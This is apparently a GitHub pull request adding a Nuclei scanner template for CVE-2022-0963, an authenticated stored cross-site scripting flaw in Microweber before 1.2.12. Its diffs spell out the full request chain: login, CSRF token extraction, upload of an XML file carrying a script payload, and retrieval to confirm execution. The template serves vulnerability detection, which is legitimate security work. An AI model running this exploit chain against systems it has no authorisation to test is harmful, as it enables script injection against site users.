### PR TITLE
Create CVE-2022-0963

### DIFF
--- a/cves/2022/CVE-2022-0963.yaml
+++ b/cves/2022/CVE-2022-0963.yaml
@@ -37,7 +37,7 @@ requests:
         X-Requested-With: XMLHttpRequest
         Content-Type: multipart/form-data; boundary=---------------------------59866212126262636974202255034
         Referer: http://{{Hostname}}/admin/view:modules/load_module:files
-        Cookie: laravel_session={{session}}; XSRF-TOKEN={{csrf_token}}
+        Cookie: laravel_session={{session}}; csrf-token-data={{csrf_token}}
 
         -----------------------------59866212126262636974202255034
         Content-Disposition: form-data; name="name"
@@ -65,11 +65,11 @@ requests:
     req-condition: true
     cookie-reuse: true
     extractors:
-      - type: kval
-        part: header
+      - type: json
+        part: body
         name: csrf_token
         kval:
-          - XSRF-TOKEN
+          - .token
         internal: true
 
       - type: kval

--- a/cves/2022/CVE-2022-0963.yaml
+++ b/cves/2022/CVE-2022-0963.yaml
@@ -1,23 +1,24 @@
 id: CVE-2022-0963
 
 info:
-  name: Unrestricted XML Files Leads to Stored XSS in Microweber
+  name: Microweber > 1.2.12 - Cross-Site Scripting
   author: amit-jd
-  severity: Medium 
-  description:  Microweber prior to 1.2.12 allows unrestricted upload of XML files, which malicious actors can exploit to cause a stored cross-site scripting attack.
+  severity: medium
+  description: |
+    Microweber prior to 1.2.12 allows unrestricted upload of XML files, which malicious actors can exploit to cause a stored cross-site scripting attack.
   reference:
     - https://huntr.dev/bounties/a89a4198-0880-4aa2-8439-a463f39f244c/
-    - https://nvd.nist.gov/vuln/detail/CVE-2022-0963
     - https://github.com/advisories/GHSA-q3x2-jvp3-wj78
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-0963
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 5.7
     cwe-id: CWE-79
-  tags: xss, microweber, CMS, upload
+  tags: cve,cve2022,xss,microweber,cms,authenticated
 
 requests:
   - raw:
-      - |-
+      - |
         POST /api/user_login HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
@@ -25,24 +26,15 @@ requests:
         username={{username}}&password={{password}}
 
       - |
-        POST /csrf/ HTTP/1.1
-        Host: {{Hostname}}
-        X-Requested-With: XMLHttpRequest
-
-      - |
         POST /plupload HTTP/1.1
         Host: {{Hostname}}
-        Accept: application/json, text/javascript, */*; q=0.01
-        X-XSRF-TOKEN: {{url_decode(csrf_token)}}
-        X-Requested-With: XMLHttpRequest
         Content-Type: multipart/form-data; boundary=---------------------------59866212126262636974202255034
         Referer: http://{{Hostname}}/admin/view:modules/load_module:files
-        Cookie: laravel_session={{session}}; csrf-token-data={{csrf_token}}
 
         -----------------------------59866212126262636974202255034
         Content-Disposition: form-data; name="name"
 
-        pocxss.xml
+        pocxss4.xml
         -----------------------------59866212126262636974202255034
         Content-Disposition: form-data; name="chunk"
 
@@ -59,30 +51,15 @@ requests:
         -----------------------------59866212126262636974202255034--
 
       - |
-        GET /userfiles/media/default/pocxss.xml HTTP/1.1
+        GET /userfiles/media/default/pocxss4.xml HTTP/1.1
         Host: {{Hostname}}
         
     req-condition: true
     cookie-reuse: true
-    extractors:
-      - type: json
-        part: body
-        name: csrf_token
-        kval:
-          - .token
-        internal: true
-
-      - type: kval
-        part: header
-        name: session
-        kval:
-          - laravel_session
-        internal: true
-        
     matchers:   
       - type: dsl
         dsl:
-          - 'contains(body_4,"alert(document.domain)")'
-          - 'status_code_4==200'
-          - 'contains(body_3,"bytes_uploaded")'
+          - 'contains(body_3,"alert(document.domain)")'
+          - 'status_code_3==200'
+          - 'contains(body_2,"bytes_uploaded")'
         condition: and

--- a/cves/2022/CVE-2022-0963.yaml
+++ b/cves/2022/CVE-2022-0963.yaml
@@ -1,0 +1,88 @@
+id: CVE-2022-0963
+
+info:
+  name: Unrestricted XML Files Leads to Stored XSS in Microweber
+  author: amit-jd
+  severity: Medium 
+  description:  Microweber prior to 1.2.12 allows unrestricted upload of XML files, which malicious actors can exploit to cause a stored cross-site scripting attack.
+  reference:
+    - https://huntr.dev/bounties/a89a4198-0880-4aa2-8439-a463f39f244c/
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-0963
+    - https://github.com/advisories/GHSA-q3x2-jvp3-wj78
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 5.7
+    cwe-id: CWE-79
+  tags: xss, microweber, CMS, upload
+
+requests:
+  - raw:
+      - |-
+        POST /api/user_login HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        username={{username}}&password={{password}}
+
+      - |
+        POST /csrf/ HTTP/1.1
+        Host: {{Hostname}}
+        X-Requested-With: XMLHttpRequest
+
+      - |
+        POST /plupload HTTP/1.1
+        Host: {{Hostname}}
+        Accept: application/json, text/javascript, */*; q=0.01
+        X-XSRF-TOKEN: {{url_decode(csrf_token)}}
+        X-Requested-With: XMLHttpRequest
+        Content-Type: multipart/form-data; boundary=---------------------------59866212126262636974202255034
+        Referer: http://{{Hostname}}/admin/view:modules/load_module:files
+        Cookie: laravel_session={{session}}; XSRF-TOKEN={{csrf_token}}
+
+        -----------------------------59866212126262636974202255034
+        Content-Disposition: form-data; name="name"
+
+        pocxss.xml
+        -----------------------------59866212126262636974202255034
+        Content-Disposition: form-data; name="chunk"
+
+        0
+        -----------------------------59866212126262636974202255034
+        Content-Disposition: form-data; name="chunks"
+
+        1
+        -----------------------------59866212126262636974202255034
+        Content-Disposition: form-data; name="file"; filename="blob"
+        Content-Type: application/octet-stream
+
+        <x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(document.domain)</x:script>
+        -----------------------------59866212126262636974202255034--
+
+      - |
+        GET /userfiles/media/default/pocxss.xml HTTP/1.1
+        Host: {{Hostname}}
+        
+    req-condition: true
+    cookie-reuse: true
+    extractors:
+      - type: kval
+        part: header
+        name: csrf_token
+        kval:
+          - XSRF-TOKEN
+        internal: true
+
+      - type: kval
+        part: header
+        name: session
+        kval:
+          - laravel_session
+        internal: true
+        
+    matchers:   
+      - type: dsl
+        dsl:
+          - 'contains(body_4,"alert(document.domain)")'
+          - 'status_code_4==200'
+          - 'contains(body_3,"bytes_uploaded")'
+        condition: and

--- a/cves/2022/CVE-2022-0963.yaml
+++ b/cves/2022/CVE-2022-0963.yaml
@@ -31,12 +31,12 @@ requests:
         POST /plupload HTTP/1.1
         Host: {{Hostname}}
         Content-Type: multipart/form-data; boundary=---------------------------59866212126262636974202255034
-        Referer: http://{{Hostname}}/admin/view:modules/load_module:files
+        Referer: {{BaseURL}}admin/view:modules/load_module:files
 
         -----------------------------59866212126262636974202255034
         Content-Disposition: form-data; name="name"
 
-        pocxss4.xml
+        {{randstr}}.xml
         -----------------------------59866212126262636974202255034
         Content-Disposition: form-data; name="chunk"
 
@@ -53,7 +53,7 @@ requests:
         -----------------------------59866212126262636974202255034--
 
       - |
-        GET /userfiles/media/default/pocxss4.xml HTTP/1.1
+        GET /userfiles/media/default/{{to_lower("{{randstr}}")}}.xml HTTP/1.1
         Host: {{Hostname}}
 
     req-condition: true

--- a/cves/2022/CVE-2022-0963.yaml
+++ b/cves/2022/CVE-2022-0963.yaml
@@ -14,6 +14,8 @@ info:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 5.7
     cwe-id: CWE-79
+  metadata:
+    verified: true
   tags: cve,cve2022,xss,microweber,cms,authenticated
 
 requests:
@@ -53,10 +55,10 @@ requests:
       - |
         GET /userfiles/media/default/pocxss4.xml HTTP/1.1
         Host: {{Hostname}}
-        
+
     req-condition: true
     cookie-reuse: true
-    matchers:   
+    matchers:
       - type: dsl
         dsl:
           - 'contains(body_3,"alert(document.domain)")'


### PR DESCRIPTION
### Template / PR Information

**Unrestricted XML files leading to cross-site scripting in Microweber**

Microweber prior to 1.2.12 allows unrestricted upload of XML files, which malicious actors can exploit to cause a stored cross-site scripting attack. 

- Added CVE-2022-0963
- References:
- [https://github.com/advisories/GHSA-q3x2-jvp3-wj78](url)
[https://huntr.dev/bounties/a89a4198-0880-4aa2-8439-a463f39f244c/](url)

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO


#### Additional Details (leave it blank if not applicable)
![mwe cve csrf poc](https://user-images.githubusercontent.com/78851976/180617988-c4bbe327-fbde-47fd-8c58-ae384eca699f.png)

<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->
<!-- Include HTTP/TCP/DNS Matched response data snippet if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)